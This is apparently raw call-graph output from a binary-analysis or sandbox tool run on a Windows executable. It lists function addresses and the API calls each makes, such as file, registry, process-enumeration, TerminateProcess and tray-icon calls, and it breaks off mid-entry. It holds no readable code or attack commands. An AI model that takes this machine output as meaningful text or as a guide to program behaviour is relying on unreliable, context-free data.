99226->99215 99226->99217 99226->99218 99226->99219 99226->99220 99226->99221 99226->99225 99253 eedf85 99226->99253 99228 eee387 4 API calls 99227->99228 99229 eedc95 99228->99229 99229->98847 99229->98850 99231 e879ed 8 API calls 99230->99231 99232 eedab6 GetFileAttributesW 99231->99232 99233 eedae3 99232->99233 99234 eedaca GetLastError 99232->99234 99233->98850 99235 eedad7 CreateDirectoryW 99234->99235 99236 eedae5 99234->99236 99235->99233 99235->99236 99236->99233 99237 e896d9 8 API calls 99236->99237 99238 eedb27 99237->99238 99239 eeda81 8 API calls 99238->99239 99240 eedb30 99239->99240 99240->99233 99241 eedb34 CreateDirectoryW 99240->99241 99241->99233 99243 e8bf07 8 API calls 99242->99243 99244 eee96d 99243->99244 99245 e8bf07 8 API calls 99244->99245 99246 eee975 99245->99246 99247 e8694e 8 API calls 99246->99247 99248 eee984 99247->99248 99249 e8694e 8 API calls 99248->99249 99250 eee994 99249->99250 99251 e9e2e5 41 API calls 99250->99251 99252 eee9a9 99251->99252 99252->99196 99254 eedfa1 99253->99254 99255 eedfbc 99254->99255 99256 eedfa6 99254->99256 99257 e8bf07 8 API calls 99255->99257 99258 e8be6d 8 API calls 99256->99258 99306 eedfb7 99256->99306 99259 eedfc4 99257->99259 99258->99306 99260 e8bf07 8 API calls 99259->99260 99261 eedfcc 99260->99261 99262 e8bf07 8 API calls 99261->99262 99263 eedfd7 99262->99263 99264 e8bf07 8 API calls 99263->99264 99265 eedfdf 99264->99265 99266 e8bf07 8 API calls 99265->99266 99267 eedfe7 99266->99267 99268 e8bf07 8 API calls 99267->99268 99269 eedfef 99268->99269 99270 e8bf07 8 API calls 99269->99270 99271 eedff7 99270->99271 99272 e8bf07 8 API calls 99271->99272 99273 eedfff 99272->99273 99274 e8694e 8 API calls 99273->99274 99275 eee016 99274->99275 99276 e8694e 8 API calls 99275->99276 99277 eee02f 99276->99277 99278 e8627c 8 API calls 99277->99278 99279 eee03b 99278->99279 99280 eee04e 99279->99280 99281 e896d9 8 API calls 99279->99281 99282 e8627c 8 API calls 99280->99282 99281->99280 99283 eee057 99282->99283 99284 eee067 99283->99284 99285 e896d9 8 API calls 99283->99285 99286 eee079 99284->99286 99287 e8be6d 8 API calls 99284->99287 99285->99284 99288 e87af4 8 API calls 99286->99288 99287->99286 99289 eee084 99288->99289 99307 eee141 8 API calls 99289->99307 99291 eee093 99308 eee141 8 API calls 99291->99308 99293 eee0a6 99294 e8627c 8 API calls 99293->99294 99295 eee0b0 99294->99295 99296 eee0c7 99295->99296 99297 eee0b5 99295->99297 99298 e8627c 8 API calls 99296->99298 99299 e865a4 8 API calls 99297->99299 99301 eee0d0 99298->99301 99300 eee0c2 99299->99300 99304 e87af4 8 API calls 99300->99304 99302 eee0ee 99301->99302 99303 e865a4 8 API calls 99301->99303 99305 e87af4 8 API calls 99302->99305 99303->99300 99304->99302 99305->99306 99306->99226 99307->99291 99308->99293 99310 e88e70 52 API calls 99309->99310 99311 f088ed 99310->99311 99332 f08932 ISource 99311->99332 99347 f09632 99311->99347 99313 f08bde 99314 f08dac 99313->99314 99319 f08bec 99313->99319 99403 f09843 59 API calls 99314->99403 99317 f08dbb 99318 f08dc7 99317->99318 99317->99319 99318->99332 99360 f087e3 99319->99360 99320 e88e70 52 API calls 99337 f089a6 99320->99337 99325 f08c25 99374 ea0000 99325->99374 99328 f08c45 99402 ef3ef6 81 API calls __wsopen_s 99328->99402 99329 f08c5f 99331 e87d51 8 API calls 99329->99331 99334 f08c6e 99331->99334 99332->98858 99333 f08c50 GetCurrentProcess TerminateProcess 99333->99329 99335 e883b0 8 API calls 99334->99335 99336 f08c87 99335->99336 99338 e91c50 8 API calls 99336->99338 99344 f08caf 99336->99344 99337->99313 99337->99320 99337->99332 99400 ee4a0c 8 API calls __fread_nolock 99337->99400 99401 f08e7c 41 API calls _strftime 99337->99401 99340 f08c9e 99338->99340 99339 f08e22 99339->99332 99341 f08e36 FreeLibrary 99339->99341 99342 f094da 74 API calls 99340->99342 99341->99332 99342->99344 99344->99339 99346 e8b3fe 8 API calls 99344->99346 99378 e91c50 99344->99378 99389 f094da 99344->99389 99346->99344 99348 e8c269 8 API calls 99347->99348 99349 f0964d CharLowerBuffW 99348->99349 99350 ee96e3 41 API calls 99349->99350 99351 f0966e 99350->99351 99353 e8bf07 8 API calls 99351->99353 99359 f096a7 _wcslen 99351->99359 99354 f09689 99353->99354 99355 e88685 8 API calls 99354->99355 99356 f0969d 99355->99356 99357 e896d9 8 API calls 99356->99357 99357->99359 99358 f097bd _wcslen 99358->99337 99359->99358 99404 f08e7c 41 API calls _strftime 99359->99404 99361 f087fe 99360->99361 99365 f08849 99360->99365 99362 ea019b 8 API calls 99361->99362 99364 f08820 99362->99364 99363 ea016b 8 API calls 99363->99364 99364->99363 99364->99365 99366 f099f5 99365->99366 99367 f09c0a ISource 99366->99367 99372 f09a19 _strcat _wcslen ___std_exception_copy 99366->99372 99367->99325 99368 e8c92d 39 API calls 99368->99372 99369 e8c5df 39 API calls 99369->99372 99370 e8c9fb 39 API calls 99370->99372 99371 e88e70 52 API calls 99371->99372 99372->99367 99372->99368 99372->99369 99372->99370 99372->99371 99405 eef7da 10 API calls _wcslen 99372->99405 99375 ea0015 99374->99375 99376 ea00ad TerminateProcess 99375->99376 99377 ea007b 99375->99377 99376->99377 99377->99328 99377->99329 99379 e91c62 99378->99379 99381 e91c6b 99379->99381 99406 e9b71c 8 API calls 99379->99406 99382 e91d20 99381->99382 99383 ea016b 8 API calls 99381->99383 99382->99344 99384 e91d89 99383->99384 99385 ea016b 8 API calls 99384->99385 99386 e91d92 99385->99386 99387 e8b25f 8 API calls 99386->99387 99388 e91da1 99387->99388 99388->99344 99390 f094f2 99389->99390 99391 f0950e 99389->99391 99390->99391 99392 f095c3 99390->99392 99393 f094f9 99390->99393 99394 f0951a 99390->99394 99391->99344 99408 ef15b3 72 API calls ISource 99392->99408 99407 eef3fd 10 API calls _strlen 99393->99407 99395 e86ab6 8 API calls 99394->99395 99395->99391 99398 f09503 99399 e86ab6 8 API calls 99398->99399 99399->99391 99400->99337 99401->99337 99402->99333 99403->99317 99404->99358 99405->99372 99406->99381 99407->99398 99408->99391 99419 eee723 99409->99419 99411 eedd9b CloseHandle 99411->98904 99412 eedce9 Process32NextW 99412->99411 99418 eedce2 99412->99418 99413 e8bf07 8 API calls 99413->99418 99414 e8b25f 8 API calls 99414->99418 99415 e8694e 8 API calls 99415->99418 99416 e87af4 8 API calls 99416->99418 99417 e9e2e5 41 API calls 99417->99418 99418->99411 99418->99412 99418->99413 99418->99414 99418->99415 99418->99416 99418->99417 99420 eee72e 99419->99420 99421 eee745 99420->99421 99424 eee74b 99420->99424 99425 ea6742 GetStringTypeW _strftime 99420->99425 99426 ea668b 39 API calls _strftime 99421->99426 99424->99418 99425->99420 99426->99424 99444 ead6be 99427->99444 99431 efa03a FindClose 99430->99431 99434 ef9fc9 99430->99434 99432 efa04b FindFirstFileW 99431->99432 99433 efa0e2 99431->99433 99440 efa060 99432->99440 99442 efa0d9 FindClose 99432->99442 99433->98936 99436 efa028 FindNextFileW 99434->99436 99438 ef9ff7 GetFileAttributesW SetFileAttributesW 99434->99438 99436->99431 99436->99434 99437 efa0c7 FindNextFileW 99437->99440 99437->99442 99438->99434 99439 efa0eb FindClose 99438->99439 99439->99433 99440->99437 99441 efa0a0 SetCurrentDirectoryW 99440->99441 99440->99442 99443 efa0c0 SetCurrentDirectoryW 99440->99443 99441->99440 99442->99433 99443->99437 99445 ead89f 99444->99445 99446 ead6d5 99444->99446 99472 eaf669 20 API calls _free 99445->99472 99446->99445 99450 ead740 99446->99450 99448 ead8af 99473 eb2b7c 26 API calls __wsopen_s 99448->99473 99451 ead764 99450->99451 99454 ead78b 99450->99454 99467 eb5153 26 API calls 2 library calls 99450->99467 99466 eaf669 20 API calls _free 99451->99466 99453 ead868 99453->99451 99456 ead87b 99453->99456 99459 ead774 99453->99459 99454->99451 99461 ead7fd 99454->99461 99468 eb5153 26 API calls 2 library calls 99454->99468 99471 eb5153 26 API calls 2 library calls 99456->99471 99457 ead820 99457->99451 99458 ead841 99457->99458 99469 eb5153 26 API calls 2 library calls 99457->99469 99458->99451 99458->99459 99463 ead857 99458->99463 99459->98921 99461->99453 99461->99457 99470 eb5153 26 API calls 2 library calls 99463->99470 99466->99459 99467->99454 99468->99461 99469->99458 99470->99459 99471->99459 99472->99448 99473->99459 99475 ec22f0 __wsopen_s 99474->99475 99476 eee790 GetShortPathNameW 99475->99476 99477 e884b7 8 API calls 99476->99477 99478 eee7b8 99477->99478 99478->98944 99478->98949 99479 e915af 99486 e9e34f 99479->99486 99481 e915c5 99495 e9e3b3 99481->99495 99483 e915ef 99484 ed61ab 99483->99484 99507 ef3ef6 81 API calls __wsopen_s 99483->99507 99487 e9e35d 99486->99487 99488 e9e370 99486->99488 99489 e8b3fe 8 API calls 99487->99489 99490 e9e3a3 99488->99490 99491 e9e375 99488->99491 99494 e9e367 99489->99494 99493 e8b3fe 8 API calls 99490->99493 99492 ea016b 8 API calls 99491->99492 99492->99494 99493->99494 99494->99481 99496 e87a14 8 API calls 99495->99496 99497 e9e3ea 99496->99497 99498 e8b25f 8 API calls 99497->99498 99500 e9e41b 99497->99500 99499 ede4e4 99498->99499 99501 e87af4 8 API calls 99499->99501 99500->99483 99502 ede4ef 99501->99502 99508 e9e73b 39 API calls 99502->99508 99504 ede502 99505 e8b3fe 8 API calls 99504->99505 99506 ede506 99504->99506 99505->99506 99506->99506 99507->99484 99508->99504 99509 e81044 99514 e82735 99509->99514 99511 e8104a 99550 ea0433 29 API calls __onexit 99511->99550 99513 e81054 99551 e829da 99514->99551 99518 e827ac 99519 e8bf07 8 API calls 99518->99519 99520 e827b6 99519->99520 99521 e8bf07 8 API calls 99520->99521 99522 e827c0 99521->99522 99523 e8bf07 8 API calls 99522->99523 99524 e827ca 99523->99524 99525 e8bf07 8 API calls 99524->99525 99526 e82808 99525->99526 99527 e8bf07 8 API calls 99526->99527 99528 e828d4 99527->99528 99561 e82d5e 99528->99561 99532 e82906 99533 e8bf07 8 API calls 99532->99533 99534 e82910 99533->99534 99535 e930e0 9 API calls 99534->99535 99536 e8293b 99535->99536 99582 e830ed 99536->99582 99538 e82957 99539 e82967 GetStdHandle 99538->99539 99540 e829bc 99539->99540 99541 ec39c1 99539->99541 99545 e829c9 OleInitialize 99540->99545 99541->99540 99542 ec39ca 99541->99542 99543 ea016b 8 API calls 99542->99543 99544 ec39d1 99543->99544 99589 ef09d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99544->99589 99545->99511 99547 ec39da 99590 ef1200 CreateThread 99547->99590 99549 ec39e6 CloseHandle 99549->99540 99550->99513 99591 e82a33 99551->99591 99554 e82a33 8 API calls 99555 e82a12 99554->99555 99556 e8bf07 8 API calls 99555->99556 99557 e82a1e 99556->99557 99558 e884b7 8 API calls 99557->99558 99559 e8276b 99558->99559 99560 e83205 6 API calls 99559->99560 99560->99518 99562 e8bf07 8 API calls 99561->99562 99563 e82d6e 99562->99563 99564 e8bf07 8 API calls 99563->99564 99565 e82d76 99564->99565 99566 e8bf07 8 API calls 99565->99566 99567 e82d91 99566->99567 99568 ea016b 8 API calls 99567->99568 99569 e828de 99568->99569 99570 e8318c 99569->99570 99571 e8319a 99570->99571 99572 e8bf07 8 API calls 99571->99572 99573 e831a5 99572->99573 99574 e8bf07 8 API calls 99573->99574 99575 e831b0 99574->99575 99576 e8bf07 8 API calls 99575->99576 99577 e831bb 99576->99577 99578 e8bf07 8 API calls 99577->99578 99579 e831c6 99578->99579 99580 ea016b 8 API calls 99579->99580 99581 e831d8 RegisterWindowMessageW 99580->99581 99581->99532 99583 ec3c69 99582->99583 99584 e830fd 99582->99584 99598 ef3b63 8 API calls 99583->99598 99585 ea016b 8 API calls 99584->99585 99587 e83105 99585->99587 99587->99538 99588 ec3c74 99589->99547 99590->99549 99599 ef11e6 14 API calls 99590->99599 99592 e8bf07 8 API calls 99591->99592 99593 e82a3e 99592->99593 99594 e8bf07 8 API calls 99593->99594 99595 e82a46 99594->99595 99596 e8bf07 8 API calls 99595->99596 99597 e82a08 99596->99597 99597->99554 99598->99588 99600 ec27a2 99603 e82a52 99600->99603 99604 ec39f4 DestroyWindow 99603->99604 99605 e82a91 mciSendStringW 99603->99605 99617 ec3a00 99604->99617 99606 e82d08 99605->99606 99607 e82aad 99605->99607 99606->99607 99609 e82d17 UnregisterHotKey 99606->99609 99608 e82abb 99607->99608 99607->99617 99635 e82e70 99608->99635 99609->99606 99611 ec3a45 99616 ec3a58 FreeLibrary 99611->99616 99618 ec3a69 99611->99618 99612 ec3a1e FindClose 99612->99617 99614 e87953 CloseHandle 99614->99617 99615 e82ad0 99615->99618 99622 e82ade 99615->99622 99616->99611 99617->99611 99617->99612 99617->99614 99619 ec3a7d VirtualFree 99618->99619 99624 e82b4b 99618->99624 99619->99618 99620 e82b3a CoUninitialize 99620->99624 99621 ec3ac5 99627 ec3ad4 ISource 99621->99627 99641 ef3c45 6 API calls ISource 99621->99641 99622->99620 99624->99621 99625 e82b56 99624->99625 99639 e82f86 VirtualFreeEx CloseHandle 99625->99639 99631 ec3b63 99627->99631 99642 ee6d63 8 API calls ISource 99627->99642 99629 e82b7c 99629->99627 99630 e82c61 99629->99630 99630->99631 99632 e82caf 99630->99632 99631->99631 99632->99631 99640 e82eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 99632->99640 99634 e82d03 99636 e82e7d 99635->99636 99637 e82ac2 99636->99637 99643 ee78b9 8 API calls 99636->99643 99637->99611 99637->99615 99639->99629 99640->99634 99641->99621 99642->99627 99643->99636 99644 ede6dd 99646 ede68a 99644->99646 99647 eee753 SHGetFolderPathW 99646->99647 99648 e884b7 8 API calls 99647->99648 99649 eee780 99648->99649 99649->99646 99650 e81098 99655 e85d78 99650->99655 99654 e810a7 99656 e8bf07 8 API calls 99655->99656 99657 e85d8f GetVersionExW 99656->99657 99658 e884b7 8 API calls 99657->99658 99659 e85ddc 99658->99659 99660 e896d9 8 API calls 99659->99660 99674 e85e12 99659->99674 99661 e85e06 99660->99661 99663 e879ed 8 API calls 99661->99663 99662 e85ecc GetCurrentProcess IsWow64Process 99664 e85ee8 99662->99664 99663->99674 99665 e85f00 LoadLibraryA 99664->99665 99666 ec50f2 GetSystemInfo 99664->99666 99667 e85f4d GetSystemInfo 99665->99667 99668 e85f11 GetProcAddress 99665->99668 99670 e85f27 99667->99670 99668->99667 99669 e85f21 GetNativeSystemInfo 99668->99669 99669->99670 99672 e85f2b FreeLibrary 99670->99672 99673 e8109d 99670->99673 99671 ec50ad 99672->99673 99675 ea0433 29 API calls __onexit 99673->99675 99674->99662 99674->99671 99675->99654 99676 e8105b 99681 e8522e 99676->99681 99678 e8106a 99712 ea0433 29 API calls __onexit 99678->99712 99680 e81074 99682 e8523e __wsopen_s 99681->99682 99683 e8bf07 8 API calls 99682->99683 99684 e852f4 99683->99684 99685 e8551b 10 API calls 99684->99685 99686 e852fd 99685->99686 99713 e851bf 99686->99713 99689 e865a4 8 API calls 99690 e85316 99689->99690 99691 e8684e 8 API calls 99690->99691 99692 e85325 99691->99692 99693 e8bf07 8 API calls 99692->99693 99694 e8532e 99693->99694 99695 e8bceb 8 API calls 99694->99695 99696 e85337 RegOpenKeyExW 99695->99696 99697 ec4bc0 RegQueryValueExW 99696->99697 99701 e85359 99696->99701 99698 ec4bdd 99697->99698 99699 ec4c56 RegCloseKey 99697->99699 99700 ea019b 8 API calls 99698->99700 99699->99701 99711 ec4c68 _wcslen 99699->99711 99702 ec4bf6 99700->99702 99701->99678 99703 e841a6 8 API calls 99702->99703 99704 ec4c01 RegQueryValueExW 99703->99704 99705 ec4c1e 99704->99705 99708 ec4c38 ISource 99704->99708 99706 e884b7 8 API calls 99705->99706 99706->99708 99707 e8627c 8 API calls 99707->99711 99708->99699 99709 e8b25f 8 API calls 99709->99711 99710 e8684e 8 API calls 99710->99711 99711->99701 99711->99707 99711->99709 99711->99710 99712->99680 99714 ec22f0 __wsopen_s 99713->99714 99715 e851cc GetFullPathNameW 99714->99715 99716 e851ee 99715->99716 99717 e884b7 8 API calls 99716->99717 99718 e8520c 99717->99718 99718->99689 99719 e8367c 99722 e83696 99719->99722 99723 e836ad 99722->99723 99724 e83711 99723->99724 99725 e836b2 99723->99725 99766 e8370f 99723->99766 99727 ec3dce 99724->99727 99728 e83717 99724->99728 99729 e8378b PostQuitMessage 99725->99729 99730 e836bf 99725->99730 99726 e836f6 DefWindowProcW 99732 e83690 99726->99732 99778 e82f24 10 API calls 99727->99778 99733 e8371e 99728->99733 99734 e83743 SetTimer RegisterWindowMessageW 99728->99734 99729->99732 99735 e836ca 99730->99735 99736 ec3e3b 99730->99736 99742 ec3d6f 99733->99742 99743 e83727 KillTimer 99733->99743 99734->99732 99737 e8376c CreatePopupMenu 99734->99737 99738 e836d4 99735->99738 99739 e83795 99735->99739 99783 eec80c 65 API calls ___scrt_fastfail 99736->99783 99737->99732 99744 e836df 99738->99744 99745 ec3e20 99738->99745 99767 e9fcbb 99739->99767 99741 ec3def 99779 e9f1c6 40 API calls 99741->99779 99749 ec3daa MoveWindow 99742->99749 99750 ec3d74 99742->99750 99774 e8388e Shell_NotifyIconW ___scrt_fastfail 99743->99774 99752 e83779 99744->99752 99753 e836ea 99744->99753 99745->99726 99782 ee1367 8 API calls 99745->99782 99746 ec3e4d 99746->99726 99746->99732 99749->99732 99754 ec3d99 SetFocus 99750->99754 99755 ec3d7a 99750->99755 99776 e837a6 75 API calls ___scrt_fastfail 99752->99776 99753->99726 99780 e8388e Shell_NotifyIconW ___scrt_fastfail 99753->99780 99754->99732 99755->99753 99758 ec3d83 99755->99758 99756 e8373a 99775 e8572c DeleteObject DestroyWindow 99756->99775 99777 e82f24 10 API calls 99758->99777 99761 e83789 99761->99732 99764 ec3e14 99781 e838f2 60 API calls ___scrt_fastfail 99764->99781 99766->99726 99768 e9fd59 99767->99768 99769 e9fcd3 ___scrt_fastfail 99767->99769 99768->99732 99784 e85f59 99769->99784 99771 e9fcfa 99772 e9fd42 KillTimer SetTimer 99771->99772 99773 edfdcb Shell_NotifyIconW 99771->99773 99772->99768 99773->99772 99774->99756 99775->99732 99776->99761 99777->99732 99778->99741 99779->99753 99780->99764 99781->99766 99782->99766 99783->99746 99785 e86058 99784->99785 99786 e85f76 99784->99786 99785->99771 99787 e87a14 8 API calls 99786->99787 99788 e85f84 99787->99788 99789 e85f91 99788->99789 99790 ec5101 LoadStringW 99788->99790 99791 e884b7 8 API calls 99789->99791 99793 ec511b 99790->99793 99792 e85fa6 99791->99792 99794 e85fb3 99792->99794 99801 ec5137 99792->99801 99796 e8be6d 8 API calls 99793->99796 99799 e85fd9 ___scrt_fastfail 99793->99799 99794->99793 99795 e85fbd 99794->99795 99797 e865a4 8 API calls 99795->99797 99796->99799 99798 e85fcb 99797->99798 99800 e87af4 8 API calls 99798->99800 99803 e8603e Shell_NotifyIconW 99799->99803 99800->99799 99801->99799 99802 ec517a 99801->99802 99804 e8bf07 8 API calls 99801->99804 99815 e9fe8f 51 API calls 99802->99815 99803->99785 99805 ec5161 99804->99805 99814 eea265 9 API calls 99805->99814 99808 ec516c 99810 e87af4 8 API calls 99808->99810 99809 ec5199 99811 e865a4 8 API calls 99809->99811 99810->99802 99812 ec51aa 99811->99812 99813 e865a4 8 API calls 99812->99813 99813->99799 99814->99808 99815->99809 99816 ede5f8 GetUserNameW 99817 ede610 99816->99817 99818 e8f470 99821 e99fa5 99818->99821 99820 e8f47c 99822 e99fc6 99821->99822 99827 e9a023 99821->99827 99824 e902f0 253 API calls 99822->99824 99822->99827 99828 e99ff7 99824->99828 99825 ed800f 99825->99825 99826 e9a067 99826->99820 99827->99826 99830 ef3ef6 81 API calls __wsopen_s 99827->99830 99828->99826 99828->99827 99829 e8be6d 8 API calls 99828->99829 99829->99827 99830->99825 99831 ed55f4 99832 e9e34f 8 API calls 99831->99832 99833 ed560a 99832->99833 99835 ed5685 99833->99835 99840 e9a9e5 9 API calls 99833->99840 99838 ed617b 99835->99838 99842 ef3ef6 81 API calls __wsopen_s 99835->99842 99837 ed5665 99837->99835 99841 ef2393 8 API calls 99837->99841 99840->99837 99841->99835 99842->99838 99843 eb8792 99848 eb854e 99843->99848 99847 eb87ba 99849 eb857f try_get_first_available_module 99848->99849 99854 ea919b 40 API calls 99849->99854 99859 eb86c8 99849->99859 99851 eb877e 99864 eb2b7c 26 API calls __wsopen_s 99851->99864 99853 eb86d3 99853->99847 99860 ec0d24 99853->99860 99855 eb871c 99854->99855 99856 ea919b 40 API calls 99855->99856 99855->99859 99857 eb873b 99856->99857 99858 ea919b 40 API calls 99857->99858 99857->99859 99858->99859 99859->99853 99863 eaf669 20 API calls _free 99859->99863 99865 ec0421 99860->99865 99862 ec0d3f 99862->99847 99863->99851 99864->99853 99867 ec042d __FrameHandler3::FrameUnwindToState 99865->99867 99866 ec043b 99923 eaf669 20 API calls _free 99866->99923 99867->99866 99869 ec0474 99867->99869 99876 ec09fb 99869->99876 99870 ec0440 99924 eb2b7c 26 API calls __wsopen_s 99870->99924 99875 ec044a __wsopen_s 99875->99862 99926 ec07cf 99876->99926 99879 ec0a2d 99958 eaf656 20 API calls _free 99879->99958 99880 ec0a46 99944 eb55b1 99880->99944 99883 ec0a32 99959 eaf669 20 API calls _free 99883->99959 99884 ec0a4b 99885 ec0a6b 99884->99885 99886 ec0a54 99884->99886 99957 ec073a CreateFileW 99885->99957 99960 eaf656 20 API calls _free 99886->99960 99890 ec0498 99925 ec04c1 LeaveCriticalSection __wsopen_s 99890->99925 99891 ec0a59 99961 eaf669 20 API calls _free 99891->99961 99892 ec0b21 GetFileType 99895 ec0b2c GetLastError 99892->99895 99896 ec0b73 99892->99896 99894 ec0af6 GetLastError 99963 eaf633 20 API calls 2 library calls 99894->99963 99964 eaf633 20 API calls 2 library calls 99895->99964 99966 eb54fa 21 API calls 3 library calls 99896->99966 99897 ec0aa4 99897->99892 99897->99894 99962 ec073a CreateFileW 99897->99962 99901 ec0b3a CloseHandle 99901->99883 99904 ec0b63 99901->99904 99903 ec0ae9 99903->99892 99903->99894 99965 eaf669 20 API calls _free 99904->99965 99905 ec0b94 99907 ec0be0 99905->99907 99967 ec094b 72 API calls 4 library calls 99905->99967 99912 ec0c0d 99907->99912 99968 ec04ed 72 API calls 4 library calls 99907->99968 99908 ec0b68 99908->99883 99911 ec0c06 99911->99912 99913 ec0c1e 99911->99913 99969 eb8a3e 99912->99969 99913->99890 99915 ec0c9c CloseHandle 99913->99915 99984 ec073a CreateFileW 99915->99984 99917 ec0cc7 99918 ec0cd1 GetLastError 99917->99918 99919 ec0cfd 99917->99919 99985 eaf633 20 API calls 2 library calls 99918->99985 99919->99890 99921 ec0cdd 99986 eb56c3 21 API calls 3 library calls 99921->99986 99923->99870 99924->99875 99925->99875 99927 ec080a 99926->99927 99928 ec07f0 99926->99928 99987 ec075f 99927->99987 99928->99927 99994 eaf669 20 API calls _free 99928->99994 99931 ec07ff 99995 eb2b7c 26 API calls __wsopen_s 99931->99995 99933 ec0842 99934 ec0871 99933->99934 99996 eaf669 20 API calls _free 99933->99996 99942 ec08c4 99934->99942 99998 eada9d 26 API calls 2 library calls 99934->99998 99937 ec08bf 99939 ec093e 99937->99939 99937->99942 99938 ec0866 99997 eb2b7c 26 API calls __wsopen_s 99938->99997 99999 eb2b8c 11 API calls _abort 99939->99999 99942->99879 99942->99880 99943 ec094a 99945 eb55bd __FrameHandler3::FrameUnwindToState 99944->99945 100002 eb32ee EnterCriticalSection 99945->100002 99947 eb560b 100003 eb56ba 99947->100003 99949 eb55e9 100006 eb5390 21 API calls 2 library calls 99949->100006 99950 eb55c4 99950->99947 99950->99949 99954 eb5657 EnterCriticalSection 99950->99954 99952 eb5634 __wsopen_s 99952->99884 99953 eb55ee 99953->99947 100007 eb54d7 EnterCriticalSection 99953->100007 99954->99947 99956 eb5664 LeaveCriticalSection 99954->99956 99956->99950 99957->99897 99958->99883 99959->99890 99960->99891 99961->99883 99962->99903 99963->99883 99964->99901 99965->99908 99966->99905 99967->99907 99968->99911 99970 eb5754 __wsopen_s 26 API calls 99969->99970 99972 eb8a4e 99970->99972 99971 eb8a54 100009 eb56c3 21 API calls 3 library calls 99971->100009 99972->99971 99973 eb8a86 99972->99973 99975 eb5754 __wsopen_s 26 API calls 99972->99975 99973->99971 99976 eb5754 __wsopen_s 26 API calls 99973->99976 99978 eb8a7d 99975->99978 99979 eb8a92 CloseHandle 99976->99979 99977 eb8aac 99980 eb8ace 99977->99980 100010 eaf633 20 API calls 2 library calls 99977->100010 99981 eb5754 __wsopen_s 26 API calls 99978->99981 99979->99971 99982 eb8a9e GetLastError 99979->99982 99980->99890 99981->99973 99982->99971 99984->99917 99985->99921 99986->99919 99990 ec0777 99987->99990 99988 ec0792 99988->99933 99990->99988 100000 eaf669 20 API calls _free 99990->100000 99991 ec07b6 100001 eb2b7c 26 API calls __wsopen_s 99991->100001 99993 ec07c1 99993->99933 99994->99931 99995->99927 99996->99938 99997->99934 99998->99937 99999->99943 100000->99991 100001->99993 100002->99950 100008 eb3336 LeaveCriticalSection 100003->100008 100005 eb56c1 100005->99952 100006->99953 100007->99947 100008->100005 100009->99977 100010->99980 100011 e81033 100016 e86686 100011->100016 100015 e81042 100017 e8bf07 8 API calls 100016->100017 100018 e866f4 100017->100018 100024 e855cc 100018->100024 100021 e86791 100022 e81038 100021->100022 100027 e868e6 8 API calls __fread_nolock 100021->100027 100023 ea0433 29 API calls __onexit 100022->100023 100023->100015 100028 e855f8 100024->100028 100027->100021 100029 e855eb 100028->100029 100030 e85605 100028->100030 100029->100021 100030->100029 100031 e8560c RegOpenKeyExW 100030->100031 100031->100029 100032 e85626 RegQueryValueExW 100031->100032 100033 e8565c RegCloseKey 100032->100033 100034 e85647 100032->100034 100033->100029 100034->100033 100035 ed3fb3 100051 e8ee60 ISource 100035->100051 100036 e8f1c1 PeekMessageW 100036->100051 100037 e8eeb7 GetInputState 100037->100036 100037->100051 100038 ed3271 TranslateAcceleratorW 100038->100051 100040 e8f23f PeekMessageW 100040->100051 100041 e8f0b4 timeGetTime 100041->100051 100042 e8f223 TranslateMessage DispatchMessageW 100042->100040 100043 e8f25f Sleep 100043->100051 100044 ed4127 Sleep 100058 ed4004 100044->100058 100046 ed338d timeGetTime 100104 e9a9e5 9 API calls 100046->100104 100048 eedc9c 46 API calls 100048->100058 100050 ed41be GetExitCodeProcess 100053 ed41ea CloseHandle 100050->100053 100054 ed41d4 WaitForSingleObject 100050->100054 100051->100036 100051->100037 100051->100038 100051->100040 100051->100041 100051->100042 100051->100043 100051->100044 100051->100046 100057 e8f085 100051->100057 100051->100058 100064 e902f0 253 API calls 100051->100064 100065 e92ad0 253 API calls 100051->100065 100067 e8f400 100051->100067 100075 e8f680 100051->100075 100098 e9f2a5 100051->100098 100103 e9f27e timeGetTime 100051->100103 100105 ef4384 8 API calls 100051->100105 100106 ef3ef6 81 API calls __wsopen_s 100051->100106 100052 f1331e GetForegroundWindow 100052->100058 100053->100058 100054->100051 100054->100053 100056 ed3cf5 100056->100057 100058->100048 100058->100050 100058->100051 100058->100052 100058->100056 100059 ed425c Sleep 100058->100059 100107 f05fb5 8 API calls 100058->100107 100108 eef1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100058->100108 100109 e9f27e timeGetTime 100058->100109 100059->100051 100064->100051 100065->100051 100068 e8f411 100067->100068 100069 e8f41f 100068->100069 100071 e8f433 100068->100071 100110 e8e910 100069->100110 100142 ef3ef6 81 API calls __wsopen_s 100071->100142 100072 e8f42a 100072->100051 100074 ed4528 100074->100074 100076 e8f6c0 100075->100076 100092 e8f78c ISource 100076->100092 100151 ea05d2 5 API calls __Init_thread_wait 100076->100151 100079 ed457d 100081 e8bf07 8 API calls 100079->100081 100079->100092 100080 e8bf07 8 API calls 100080->100092 100084 ed4597 100081->100084 100082 e8bdc1 39 API calls 100082->100092 100152 ea0433 29 API calls __onexit 100084->100152 100086 ed45a1 100153 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100086->100153 100090 e902f0 253 API calls 100090->100092 100091 e8be6d 8 API calls 100091->100092 100092->100080 100092->100082 100092->100090 100092->100091 100093 e8fa91 100092->100093 100094 e91c50 8 API calls 100092->100094 100095 ef3ef6 81 API calls 100092->100095 100150 e9b2d6 253 API calls 100092->100150 100154 ea05d2 5 API calls __Init_thread_wait 100092->100154 100155 ea0433 29 API calls __onexit 100092->100155 100156 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100092->100156 100157 f05131 101 API calls 100092->100157 100158 f0721e 253 API calls 100092->100158 100093->100051 100094->100092 100095->100092 100100 e9f2b8 100098->100100 100101 e9f2c1 100098->100101 100099 e9f2e5 IsDialogMessageW 100099->100100 100099->100101 100100->100051 100101->100099 100101->100100 100102 edf83b GetClassLongW 100101->100102 100102->100099 100102->100101 100103->100051 100104->100051 100105->100051 100106->100051 100107->100058 100108->100058 100109->100058 100111 e902f0 253 API calls 100110->100111 100129 e8e94d 100111->100129 100112 ed3176 100149 ef3ef6 81 API calls __wsopen_s 100112->100149 100114 e8e9bb ISource 100114->100072 100115 e8ed85 100115->100114 100124 ea019b 8 API calls 100115->100124 100116 e8ea73 100116->100115 100118 e8ea7e 100116->100118 100117 e8ecaf 100120 ed3167 100117->100120 100121 e8ecc4 100117->100121 100119 ea016b 8 API calls 100118->100119 100131 e8ea85 __fread_nolock 100119->100131 100148 f06062 8 API calls 100120->100148 100126 